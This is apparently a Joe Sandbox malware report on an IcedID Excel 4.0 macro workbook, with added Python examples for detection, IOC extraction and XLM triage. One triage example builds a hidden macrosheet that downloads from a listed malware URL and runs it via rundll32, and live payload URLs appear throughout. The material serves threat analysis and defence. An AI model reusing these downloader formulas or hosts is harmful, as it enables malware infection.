Analysis Report 91476525608-04012021.xlsm

Overview

General Information

Sample Name: 91476525608-04012021.xlsm
Analysis ID: 380316
MD5: e8d0244666daf465e9914a7f56938412
SHA1: 3c5f71752b0cea18b06dfad9a96cdfeb053f45cc
SHA256: 196668480754f95f98c6e59d4776e4f8c756ad3be9fd48a27cfcb50be329567e
Tags: IcedID, xlsm

Detection

Hidden Macro 4.0
Score: 84 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 288, cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2652, cmdline: rundll32 ..\Hodas.vyur,PluginInit, MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2592, cmdline: rundll32 ..\Hodas.vyur1,PluginInit, MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2740, cmdline: rundll32 ..\Hodas.vyur2,PluginInit, MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  Command: rundll32 ..\Hodas.vyur,PluginInit
  CommandLine: rundll32 ..\Hodas.vyur,PluginInit
  CommandLine|base64offset|contains: ]
  Image: C:\Windows\System32\rundll32.exe
  NewProcessName: C:\Windows\System32\rundll32.exe
  OriginalFileName: C:\Windows\System32\rundll32.exe
  ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  ParentProcessId: 288
  ProcessCommandLine: rundll32 ..\Hodas.vyur,PluginInit
  ProcessId: 2652
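How that Sigma match reduces to code, as an added example (it is neither the Sigma rule text nor Joe Sandbox's own engine): the parent/child check runs over constructed process-creation events, three of which reproduce the rundll32 launches from the process tree above, and the DLL path and export are pulled out of each rundll32 command line so the relative path and the non-.dll extension can be scored. The Office and shell image lists are this example's approximation of the rule; the two benign events are made up for contrast.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Parent images treated as Office products and child images treated as shells /
# LOLBins. These sets are this example's approximation of the public Sigma rule
# "Microsoft Office Product Spawning Windows Shell", not the rule text itself.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "visio.exe", "outlook.exe", "onenote.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "msiexec.exe",
                  "certutil.exe", "bitsadmin.exe", "schtasks.exe", "wmic.exe", "hh.exe"}

# rundll32 <dll>,<export>; the DLL path may be quoted and need not end in .dll.
RUNDLL32_CALL = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^\s",]+)"?\s*,\s*(?P<export>\w+)', re.I)


@dataclass
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str
    parent_command_line: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def rundll32_details(command_line: str) -> Optional[dict]:
    """Extract the DLL path and export from a rundll32 command line and note the
    two traits that make this sample's launches stand out: a relative path and
    a file extension that is not .dll."""
    m = RUNDLL32_CALL.search(command_line)
    if not m:
        return None
    dll = m.group("dll")
    return {
        "dll": dll,
        "export": m.group("export"),
        "relative_path": not (ntpath.isabs(dll) or re.match(r"^[A-Za-z]:\\", dll)),
        "non_dll_extension": not dll.lower().endswith(".dll"),
    }


def detect_office_spawn(events: List[ProcessEvent]) -> List[dict]:
    """Return one alert per event whose parent is an Office product and whose
    child is a shell/LOLBin; rundll32 children get extra scoring."""
    alerts = []
    for ev in events:
        if _basename(ev.parent_image) not in OFFICE_PARENTS:
            continue
        child = _basename(ev.image)
        if child not in SHELL_CHILDREN:
            continue
        alert = {
            "rule": "Microsoft Office Product Spawning Windows Shell",
            "parent": f"{_basename(ev.parent_image)} (pid {ev.parent_pid})",
            "child": f"{child} (pid {ev.pid})",
            "command_line": ev.command_line,
            "techniques": ["Exploitation for Client Execution"],
            "severity": "medium",
        }
        if child == "rundll32.exe":
            details = rundll32_details(ev.command_line)
            if details:
                alert["rundll32"] = details
                alert["techniques"].append("Rundll32")
                if details["relative_path"] or details["non_dll_extension"]:
                    alert["severity"] = "high"
        alerts.append(alert)
    return alerts


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EXCEL_CMD = r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"
RUNDLL32 = r"C:\Windows\System32\rundll32.exe"

# Constructed event list: the three rundll32 launches from the report's process
# tree plus two benign events (made up) that the rule must not fire on.
SAMPLE_EVENTS = [
    ProcessEvent(2652, RUNDLL32, r"rundll32 ..\Hodas.vyur,PluginInit", 288, EXCEL, EXCEL_CMD),
    ProcessEvent(2592, RUNDLL32, r"rundll32 ..\Hodas.vyur1,PluginInit", 288, EXCEL, EXCEL_CMD),
    ProcessEvent(2740, RUNDLL32, r"rundll32 ..\Hodas.vyur2,PluginInit", 288, EXCEL, EXCEL_CMD),
    ProcessEvent(3100, r"C:\Windows\splwow64.exe", "splwow64.exe 8192", 288, EXCEL, EXCEL_CMD),
    ProcessEvent(3200, RUNDLL32, r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
                 1400, r"C:\Windows\explorer.exe", "explorer.exe"),
]

if __name__ == "__main__":
    for a in detect_office_spawn(SAMPLE_EVENTS):
        print(a["severity"], a["parent"], "->", a["child"], a["command_line"])
```

The parent/child pairing alone would also fire on legitimate add-ins that shell out, which is why the rundll32 scoring is separate: a DLL loaded from a relative path with an invented extension, as here, is what lifts the alert to high.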

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://195.123.210.186/44285,5327891204.dat  Avira URL Cloud label: malware
Source: http://91.211.89.28/44285,5327891204.dat  Avira URL Cloud label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll  origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process created: C:\Windows\System32\rundll32.exe
Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 45.150.67.243:80 (listed twice)
Source: Joe Sandbox View  IP Address: 195.123.210.186
Source: global traffic  HTTP traffic detected. The same request was sent to 45.150.67.243, 195.123.210.186 and 91.211.89.28 (each listed twice in the report); shown once with its header line breaks restored:
  GET /44285,5327891204.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 45.150.67.243
  Connection: Keep-Alive
Source: unknown  TCP traffic detected without corresponding DNS query: 45.150.67.243 (6 entries), 91.211.89.28 (6 entries)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB206F33.gif
Source: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmp  Strings found in binary or memory:
  Please visit http://www.hotmail.com/oe to learn more. (equals www.hotmail.com (Hotmail))
  http://investor.msn.com
  http://investor.msn.com/
  http://www.hotmail.com/oe
  http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmp  Strings found in binary or memory:
  http://localizability/practices/XML.asp
  http://localizability/practices/XMLConfiguration.asp
  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
  http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmp  String found in binary or memory: http://www.windows.com/pctv.
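Turning the captured requests into shareable indicators, as an added example (not part of the report or of Joe Sandbox): it parses the GET requests above, rebuilt as constructed input with the CRLF line breaks the report's rendering dropped, collapses repeats into one record per URL, flags requests whose Host header is a literal IP address with no DNS answer anywhere in the capture, notes the browser User-Agent, and defangs the URLs. The dns_answers mapping is an assumed input; the capture in this report recorded no DNS queries at all, so it is empty here.

```python
import ipaddress
from typing import Dict, List, Set
from urllib.parse import urlsplit

_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
       ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
       "Media Center PC 6.0; .NET4.0C; .NET4.0E)")


def _request(host: str) -> bytes:
    """Constructed copy of the captured request with CRLF line endings restored."""
    return ("GET /44285,5327891204.dat HTTP/1.1\r\n"
            "Accept: */*\r\n"
            "UA-CPU: AMD64\r\n"
            "Accept-Encoding: gzip, deflate\r\n"
            f"User-Agent: {_UA}\r\n"
            f"Host: {host}\r\n"
            "Connection: Keep-Alive\r\n\r\n").encode("ascii")


# The capture shows the same request to three hosts; one is repeated here.
SAMPLE_REQUESTS = [_request(h) for h in
                   ("45.150.67.243", "195.123.210.186", "91.211.89.28", "45.150.67.243")]


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into request line and lower-cased headers."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IP address (optionally with :port)."""
    candidate = host.strip("[]")
    if candidate.count(":") == 1:  # IPv4:port
        candidate = candidate.split(":")[0]
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def defang(url: str) -> str:
    """hxxp://1[.]2[.]3[.]4/path form for pasting into tickets and reports."""
    p = urlsplit(url)
    query = f"?{p.query}" if p.query else ""
    return f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}{query}"


def extract_iocs(requests: List[bytes], dns_answers: Dict[str, Set[str]]) -> List[dict]:
    """One record per unique URL. dns_answers maps a queried hostname to the
    addresses it resolved to in the same capture; a literal-IP Host with no such
    answer means the address was hard-coded rather than resolved."""
    resolved = {ip for ips in dns_answers.values() for ip in ips}
    records: Dict[str, dict] = {}
    for raw in requests:
        req = parse_http_request(raw)
        host = req["headers"].get("host", "")
        url = f"http://{host}{req['target']}"
        if url in records:
            records[url]["hits"] += 1
            continue
        ua = req["headers"].get("user-agent", "")
        records[url] = {
            "url": url,
            "defanged": defang(url),
            "host": host,
            "path": req["target"],
            "hits": 1,
            "direct_to_ip": is_bare_ip(host),
            "no_dns": is_bare_ip(host) and host.split(":")[0] not in resolved,
            "user_agent": ua,
            "claims_browser": ua.startswith("Mozilla/") and ("MSIE" in ua or "Trident/" in ua),
        }
    return list(records.values())


if __name__ == "__main__":
    for ioc in extract_iocs(SAMPLE_REQUESTS, {}):
        flags = [k for k in ("direct_to_ip", "no_dns", "claims_browser") if ioc[k]]
        print(f"{ioc['defanged']}  hits={ioc['hits']}  {' '.join(flags)}")
```

The User-Agent is the clue the "known web browser user agent" signature is pointing at: URLDownloadToFile goes through urlmon, which sends Internet Explorer's User-Agent string, so an IE 7 browser UA on a connection opened by EXCEL.EXE is the mismatch worth alerting on, and the three hard-coded addresses with no DNS lookup are the retry list.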

System Summary:

Found malicious Excel 4.0 Macro
Source: 91476525608-04012021.xlsm  Initial sample: URLDownloadToFileA
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8  Screenshot OCR: Enable editing button from the yellow bar above 15 0 Once you have enabled editing, please click En
Source: Screenshot number: 8  Screenshot OCR: Enable Content button from the yellow bar above 16 17 18 19 20 21 22 ' 23 24 25 26 27 2
Source: Document image extraction number: 0  Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0  Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1  Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1  Screenshot OCR: Enable Content button from the yellow bar above
Source: Screenshot number: 12  Screenshot OCR: Enable editing button from the yeljcw bar above 15 0 Once you have enabled editing, please c|icREna
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation  OLE, VBA macro: Module Module1, Function Auto_Open, API Microsoft Excel: Application.Run(:Range)
Found Excel 4.0 Macro with suspicious formulas
Source: 91476525608-04012021.xlsm  Initial sample: EXEC (3 occurrences)
Source: 91476525608-04012021.xlsm  OLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentation  OLE, VBA macro: Module Module1, Function Auto_Open
Source: 91476525608-04012021.xlsm  OLE indicator, VBA macros: true
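The static checks behind a "Hidden Macro 4.0" verdict, as an added example (not Joe Sandbox's code, and the workbook it builds is a constructed stand-in rather than the analysed file): an .xlsm is opened as a zip and examined for xl/macrosheets/, sheets marked hidden or veryHidden in workbook.xml, Auto_Open-style defined names, the presence of a VBA project, and XLM formulas that call EXEC, CALL or URLDownloadToFile. The CALL/EXEC formulas in the stand-in approximate the EXEC and URLDownloadToFileA pattern the report flags; their argument layout is this example's assumption, while the URL and the rundll32 command are the ones the report records.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
XM_NS = "http://schemas.microsoft.com/office/excel/2006/main"

# Excel 4.0 (XLM) functions worth flagging in a macrosheet. Not exhaustive; the
# report flags EXEC and the URLDownloadToFileA import in this sample.
SUSPICIOUS_TOKENS = ("EXEC(", "CALL(", "REGISTER(", "URLDOWNLOADTOFILE", "FORMULA.FILL(", "CHAR(")


def _tag(name: str) -> str:
    return "{%s}%s" % (MAIN_NS, name)


def build_sample_xlsm(with_macro: bool = True) -> bytes:
    """Constructed stand-in for the analysed workbook, NOT the real file: a visible
    sheet, a veryHidden XLM macrosheet reached through an Auto_Open name, and a
    stub vbaProject.bin. Formula arguments are assumed, not taken from the sample."""
    workbook = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<workbook xmlns="%s" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/>%s</sheets>%s</workbook>'
    ) % (MAIN_NS,
         '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>' if with_macro else "",
         '<definedNames><definedName name="Auto_Open">Macro1!$A$1</definedName></definedNames>'
         if with_macro else "")
    worksheet = ('<worksheet xmlns="%s"><sheetData><row r="1"><c r="A1" t="inlineStr">'
                 '<is><t>Enable Content</t></is></c></row></sheetData></worksheet>') % MAIN_NS
    macrosheet = (
        '<xm:macrosheet xmlns="%s" xmlns:xm="%s"><sheetData>'
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
        '"http://45.150.67.243/44285,5327891204.dat","..\\Hodas.vyur",0,0)</f><v>0</v></c></row>'
        '<row r="2"><c r="A2"><f>EXEC("rundll32 ..\\Hodas.vyur,PluginInit")</f><v>1</v></c></row>'
        '<row r="3"><c r="A3"><f>HALT()</f><v>0</v></c></row>'
        '</sheetData></xm:macrosheet>'
    ) % (MAIN_NS, XM_NS)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml", worksheet)
        if with_macro:
            z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 28)  # OLE header stub
    return buf.getvalue()


def triage_xlsm(data: bytes) -> dict:
    """Static XLM triage of an Office Open XML workbook held in memory."""
    f = {"macrosheets": [], "hidden_sheets": [], "auto_names": [],
         "suspicious_formulas": [], "has_vba": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        f["has_vba"] = "xl/vbaProject.bin" in names
        f["macrosheets"] = sorted(n for n in names if n.startswith("xl/macrosheets/"))
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(z.read("xl/workbook.xml"))
            for sh in wb.iter(_tag("sheet")):           # hidden / veryHidden sheets
                state = sh.get("state", "visible")
                if state != "visible":
                    f["hidden_sheets"].append((sh.get("name"), state))
            for dn in wb.iter(_tag("definedName")):     # XLM auto-start names
                if re.search(r"auto_(open|close|activate)", dn.get("name", ""), re.I):
                    f["auto_names"].append((dn.get("name"), dn.text))
        for ms in f["macrosheets"]:                     # scan every cell formula
            root = ET.fromstring(z.read(ms))
            for c in root.iter(_tag("c")):
                formula = c.find(_tag("f"))
                if formula is None or not formula.text:
                    continue
                hits = [t for t in SUSPICIOUS_TOKENS if t in formula.text.upper()]
                if hits:
                    f["suspicious_formulas"].append((ms, c.get("r"), formula.text, hits))
    if f["suspicious_formulas"] and (f["hidden_sheets"] or f["auto_names"]):
        f["verdict"] = "malicious-likely"
    elif f["suspicious_formulas"] or f["macrosheets"]:
        f["verdict"] = "review"
    else:
        f["verdict"] = "no-xlm"
    return f


if __name__ == "__main__":
    result = triage_xlsm(build_sample_xlsm())
    print(result["verdict"], result["hidden_sheets"], result["auto_names"])
    for sheet, cell, text, hits in result["suspicious_formulas"]:
        print(f"  {sheet}!{cell}: {text}  <- {hits}")
```

In this sample the XLM sheet was not started by an Auto_Open name but by the VBA Auto_Open calling Application.Run on a range, which is why the check also reports has_vba; a workbook with both a VBA project and a hidden macrosheet deserves the "review" verdict even when no XLM auto-name exists.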
Source: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmp  Binary or memory string: .VBPud<_
Source: classification engine  Classification label: mal84.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File created: C:\Users\user\Desktop\~$91476525608-04012021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File created: C:\Users\user\AppData\Local\Temp\CVRCEF2.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe  Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown  Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit (listed 3 times)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInit (listed twice)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInit (listed twice)
Source: C:\Windows\System32\rundll32.exe  Automated click: OK (3 times)
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: 91476525608-04012021.xlsm  Initial sample: OLE zip file path = xl/media/image1.gif
Source: 91476525608-04012021.xlsm  Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Process information set: NOOPENFILEERRORBOX (28 times)
Source: C:\Windows\System32\rundll32.exe  Process information set: NOOPENFILEERRORBOX (3 times)

Mitre Att&ck Matrix

Techniques with a match in this analysis, by tactic. The number after each technique is the match count exactly as rendered in the report's matrix; cells without a count are the unmatched matrix template and are not listed.

Execution: Scripting 32; Exploitation for Client Execution 22
Privilege Escalation: Process Injection 1
Defense Evasion: Masquerading 1; Disable or Modify Tools 1; Rundll32 1; Process Injection 1; Scripting 32
Discovery: File and Directory Discovery 1; System Information Discovery 2
Command and Control: Non-Application Layer Protocol 1; Application Layer Protocol 11; Ingress Tool Transfer 2
Initial Access, Persistence, Credential Access, Lateral Movement, Collection, Exfiltration, Network Effects, Remote Service Effects, Impact: no matches


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe (listed 4 times)
http://195.123.210.186/44285,5327891204.dat | 100% | Avira URL Cloud | malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe (listed 3 times)
http://91.211.89.28/44285,5327891204.dat | 100% | Avira URL Cloud | malware
http://45.150.67.243/44285,5327891204.dat | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://195.123.210.186/44285,5327891204.dat | true | Avira URL Cloud: malware | unknown
http://91.211.89.28/44285,5327891204.dat | true | Avira URL Cloud: malware | unknown
http://45.150.67.243/44285,5327891204.dat | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Dump set A: rundll32.exe, 00000003.00000002.2108024302.0000000001C00000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2103871437.0000000001C60000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmp
Dump set B: rundll32.exe, 00000003.00000002.2108459215.0000000001DE7000.00000002.00000001.sdmp; rundll32.exe, 00000004.00000002.2104076752.0000000001E47000.00000002.00000001.sdmp; rundll32.exe, 00000005.00000002.2097854236.0000000001CA7000.00000002.00000001.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | Dump set B | false | - | high
http://www.windows.com/pctv. | rundll32.exe, 00000005.00000002.2097651062.0000000001AC0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | Dump set A | false | - | high
http://www.msnbc.com/news/ticker.txt | Dump set A | false | - | high
http://www.icra.org/vocabulary/. | Dump set B | false | URL Reputation: safe (listed 4 times) | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | Dump set B | false | URL Reputation: safe (listed 3 times) | unknown
http://www.hotmail.com/oe | Dump set A | false | - | high
http://investor.msn.com/ | Dump set A | false | - | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
195.123.210.186 | unknown | Bulgaria | 50979 | ITL-LV | false
45.150.67.243 | unknown | Montenegro | 61317 | ASDETUKhttpwwwheficedcomGB | false
91.211.89.28 | unknown | Ukraine | 206638 | HOSTFORYUA | false

              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 380316
Start date: 01.04.2021
Start time: 21:31:04
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 91476525608-04012021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.expl.evad.winXLSM@7/7@0/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

Match: 195.123.210.186
Associated samples (every entry has detection "malicious" and context URL 195.123.210.186/44285,5327891204.dat; each sample is listed three times in the report):
• 91399367380-04012021.xlsm
• 91377263701-04012021.xlsm
• 9792762096-04012021.xlsm
• 9486635218-04012021.xlsm
• 91193148799-04012021.xlsm
• 9924431196-04012021.xlsm

              Domains

              No context

              ASN

Match: HOSTFORYUA (every associated sample has detection "malicious")
• 71608606512-04012021.xlsm -> 91.211.91.69 (listed 3 times)
• 91399367380-04012021.xlsm -> 91.211.89.28 (listed 3 times)
• 7225471124-04012021.xlsm -> 91.211.91.69 (listed 3 times)
• 7275060031-04012021.xlsm -> 91.211.91.69 (listed 3 times)
• 91377263701-04012021.xlsm -> 91.211.89.28 (listed 3 times)
• 71911261256-04012021.xlsm -> 91.211.91.69 (listed 3 times)
• 9792762096-04012021.xlsm -> 91.211.89.28
• 9486635218-04012021.xlsm -> 91.211.89.28

Match: ITL-LV (every associated sample has detection "malicious")
• 71608606512-04012021.xlsm -> 195.123.210.248 (listed 3 times)
• 91399367380-04012021.xlsm -> 195.123.210.186 (listed 3 times)
• 7225471124-04012021.xlsm -> 195.123.210.248 (listed 3 times)
• 7275060031-04012021.xlsm -> 195.123.210.248 (listed 3 times)
• 91377263701-04012021.xlsm -> 195.123.210.186 (listed 3 times)
• 71911261256-04012021.xlsm -> 195.123.210.248 (listed 3 times)
• 9792762096-04012021.xlsm -> 195.123.210.186
• 9486635218-04012021.xlsm -> 195.123.210.186

Match: ASDETUKhttpwwwheficedcomGB (every associated sample has detection "malicious")
• 71608606512-04012021.xlsm -> 45.150.67.244 (listed 3 times)
• 91399367380-04012021.xlsm -> 45.150.67.243
• 7225471124-04012021.xlsm (the page is cut off here; no address follows)
              • 45.150.67.244
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              9792762096-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              9486635218-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB206F33.gif
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:GIF image data, version 89a, 1600 x 1600
              Category:dropped
              Size (bytes):158055
              Entropy (8bit):7.981278766139217
              Encrypted:false
              SSDEEP:3072:4XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGq:AE5SDvbXAyHbVt15wTQDl
              MD5:CB67CED3017DF7803FBA5D86FCEB4276
              SHA1:C7B8B4A44BDF7F7775F61FCF236A0834CB321733
